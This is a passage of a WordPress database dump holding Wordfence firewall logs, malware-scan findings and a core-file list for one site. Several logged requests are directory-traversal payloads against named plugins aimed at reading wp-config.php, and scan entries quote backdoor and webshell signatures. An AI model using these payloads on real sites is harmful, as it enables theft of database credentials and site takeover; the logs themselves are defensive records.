wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(186,1627934939.429543,1627934939.278800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(187,0.000000,1627999491.617838,'\0\0\0\0\0\0\0\0\0\0��-�H4',0,200,0,0,0,'https://westonspirit.org.uk/wp-login.php?action=lostpassword','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','lostPassword',NULL,NULL),(188,1628045376.550583,1628045376.440700,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://westonspirit.org.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(189,1628045372.561045,1628045372.468000,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://westonspirit.org.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(190,0.000000,1628202807.313396,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.westonspirit.org.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(191,0.000000,1628241083.711114,'\0\0\0\0\0\0\0\0\0\0����qH',0,302,0,1,0,'https://www.westonspirit.org.uk/wp-login.php','https://www.westonspirit.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36','loginOK',NULL,NULL),(192,1628292209.804464,1628292209.726700,'\0\0\0\0\0\0\0\0\0\0��_i}T',0,403,0,0,0,'https://westonspirit.org.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(193,1628292209.456079,1628292209.371400,'\0\0\0\0\0\0\0\0\0\0��_i}T',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(194,1628292209.042078,1628292208.955000,'\0\0\0\0\0\0\0\0\0\0��_i}T',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(195,1628651157.715050,1628651146.122900,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(196,1628651136.443787,1628651105.940200,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(197,1628651089.811094,1628651084.320700,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://westonspirit.org.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(198,1628720977.200996,1628720977.112600,'\0\0\0\0\0\0\0\0\0\0��Å(.',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(199,1628720963.187574,1628720963.070400,'\0\0\0\0\0\0\0\0\0\0��Å(.',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(200,1628720946.086919,1628720945.999500,'\0\0\0\0\0\0\0\0\0\0��Å(.',0,403,0,0,0,'https://westonspirit.org.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(201,0.000000,1628980462.658127,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.westonspirit.org.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(202,1629308435.351410,1629308435.264700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(203,0.000000,1629381709.088167,'\0\0\0\0\0\0\0\0\0\0����qH',0,302,0,1,0,'https://www.westonspirit.org.uk/wp-login.php','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36','loginOK',NULL,NULL),(204,0.000000,1629755630.960102,'\0\0\0\0\0\0\0\0\0\0��gF�B',0,302,0,1,0,'https://www.westonspirit.org.uk/wp-login.php','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','loginOK',NULL,NULL);
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhoover`
--

DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhoover`
--

LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfissues`
--

DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=313 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfissues`
--

LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (302,1629498631,1629498631,'new','knownfile',75,'709472fb98bc32851c46bb4aa85d0c4c','63d80d134f5d0fc4469b0e149c0c0f1a','Unknown file in WordPress core: wp-admin/css/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:22:\"wp-admin/css/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(303,1629498635,1629498635,'new','knownfile',75,'9107092eadf4cec918b492454b7ef16c','50179cf2b20d8b88604f6261a529d3ab','Unknown file in WordPress core: wp-admin/includes/fm.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:24:\"wp-admin/includes/fm.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(304,1629498638,1629498638,'new','knownfile',75,'5932373b076284ef75496d4bc2a0d135','45b2957266dc8d185d091ce2ffeec7f8','Unknown file in WordPress core: wp-admin/maint/hnsqbue.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:26:\"wp-admin/maint/hnsqbue.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(305,1629498638,1629498638,'new','knownfile',75,'e8031935df8fee8b988c4daab14e0e00','9990d702d9f50abe189f5f3d5b323c35','Unknown file in WordPress core: wp-admin/maint/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:24:\"wp-admin/maint/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(306,1629498668,1629498668,'new','knownfile',25,'42d3b8e466048315341f9bab1a6cf7d1','e2aa4fed6ce5ca5897eb8393ac0256a6','Old WordPress core file not removed during update: wp-includes/css/dist/editor/editor-styles-rtl.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:49:\"wp-includes/css/dist/editor/editor-styles-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(307,1629498668,1629498668,'new','knownfile',25,'cc32ece7a4b5ae4d279934589e2324f4','642f1f89465684214ca76f5aaffd8275','Old WordPress core file not removed during update: wp-includes/css/dist/editor/editor-styles-rtl.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:53:\"wp-includes/css/dist/editor/editor-styles-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(308,1629498668,1629498668,'new','knownfile',25,'6b8a86c1e0f0d37331a598568303c29f','f7e4d68e3fdadec79766b98c63f6dc37','Old WordPress core file not removed during update: wp-includes/css/dist/editor/editor-styles.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:45:\"wp-includes/css/dist/editor/editor-styles.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(309,1629498668,1629498668,'new','knownfile',25,'e1ca2e5ea41b5dafe3063c5d1435886c','d3ab2d8a318d39f09b1512309ccbc55f','Old WordPress core file not removed during update: wp-includes/css/dist/editor/editor-styles.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:49:\"wp-includes/css/dist/editor/editor-styles.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(310,1629498687,1629498687,'new','file',100,'c0146d30c3515bcd22ae9334a1950876','8b1c4462d16584d49fa12ba6f1cf2d14','File appears to be malicious or unsafe: wp-admin/css/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">$_COOKIE;(count($</strong> <br><br>The issue type is: <strong>Backdoor:PHP/cookie.count.10422</strong><br>Description: <strong>Code often seen in file managers and backdoors.</strong>','a:9:{s:4:\"file\";s:22:\"wp-admin/css/index.php\";s:4:\"shac\";s:64:\"4D1F217C5E3B3EC8C162492446CE981A59B4BC9F4EC09CCFA325345CB93F35EE\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(311,1629498687,1629498687,'new','file',100,'e38bfb52e03289a61b98b46b105f3307','f016924af3b9e7c1fdfe8295e382164d','File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">@gzuncompress(@base64_decode($________))){setcookie</strong> <br><br>The issue type is: <strong>Backdoor:PHP/B4BK2tA.4056</strong><br>Description: <strong>A backdoor known as B4BK2tA</strong>','a:9:{s:4:\"file\";s:26:\"wp-admin/maint/hnsqbue.php\";s:4:\"shac\";s:64:\"4B5901C79DE4A8490D9E8D7C707335764D254732824C07DA4ABE7BC017021F2C\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(312,1629498687,1629498687,'new','file',100,'0e160b8303bc2cd2794b9ec92851ecfb','8d8b0122f554b0700816e8a9ed4db550','File appears to be malicious or unsafe: wp-admin/includes/fm.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">&lt;title&gt;PHP File Manager&lt;/title&gt;</strong> <br><br>The issue type is: <strong>Suspicious:PHP/filemanager.6443</strong><br>Description: <strong>File Manager script that can be used as a webshell. Delete if it&#039;s not being used</strong>','a:9:{s:4:\"file\";s:24:\"wp-admin/includes/fm.php\";s:4:\"shac\";s:64:\"126B0044B2B85F539627A71CFF094ED67729288B48240EACDDC43C308FC436C7\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3667 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfknownfilelist`
--

LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wp-activate.php'),(5,'wp-admin/about.php'),(6,'wp-admin/admin-ajax.php'),(7,'wp-admin/admin-footer.php'),(8,'wp-admin/admin-functions.php'),(9,'wp-admin/admin-header.php'),(10,'wp-admin/admin-post.php'),(11,'wp-admin/admin.php'),(12,'wp-admin/async-upload.php'),(13,'wp-admin/authorize-application.php'),(14,'wp-admin/comment.php'),(15,'wp-admin/credits.php'),(16,'wp-admin/css/about-rtl.css'),(17,'wp-admin/css/about-rtl.min.css'),(18,'wp-admin/css/about.css'),(19,'wp-admin/css/about.min.css'),(20,'wp-admin/css/admin-menu-rtl.css'),(21,'wp-admin/css/admin-menu-rtl.min.css'),(22,'wp-admin/css/admin-menu.css'),(23,'wp-admin/css/admin-menu.min.css'),(24,'wp-admin/css/code-editor-rtl.css'),(25,'wp-admin/css/code-editor-rtl.min.css'),(26,'wp-admin/css/code-editor.css'),(27,'wp-admin/css/code-editor.min.css'),(28,'wp-admin/css/color-picker-rtl.css'),(29,'wp-admin/css/color-picker-rtl.min.css'),(30,'wp-admin/css/color-picker.css'),(31,'wp-admin/css/color-picker.min.css'),(32,'wp-admin/css/colors/_admin.scss'),(33,'wp-admin/css/colors/_mixins.scss'),(34,'wp-admin/css/colors/_variables.scss'),(35,'wp-admin/css/colors/blue/colors-rtl.css'),(36,'wp-admin/css/colors/blue/colors-rtl.min.css'),(37,'wp-admin/css/colors/blue/colors.css'),(38,'wp-admin/css/colors/blue/colors.min.css'),(39,'wp-admin/css/colors/blue/colors.scss'),(40,'wp-admin/css/colors/coffee/colors-rtl.css'),(41,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(42,'wp-admin/css/colors/coffee/colors.css'),(43,'wp-admin/css/colors/coffee/colors.min.css'),(44,'wp-admin/css/colors/coffee/colors.scss'),(45,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(47,'wp-admin/css/colors/ectoplasm/colors.css'),(48,'wp-admin/css/colors/ectoplasm/colors.min.css'),(49,'wp-admin/css/colors/ectoplasm/colors.scss'),(50,'wp-admin/css/colors/light/colors-rtl.css'),(51,'wp-admin/css/colors/light/colors-rtl.min.css'),(52,'wp-admin/css/colors/light/colors.css'),(53,'wp-admin/css/colors/light/colors.min.css'),(54,'wp-admin/css/colors/light/colors.scss'),(55,'wp-admin/css/colors/midnight/colors-rtl.css'),(56,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(57,'wp-admin/css/colors/midnight/colors.css'),(58,'wp-admin/css/colors/midnight/colors.min.css'),(59,'wp-admin/css/colors/midnight/colors.scss'),(60,'wp-admin/c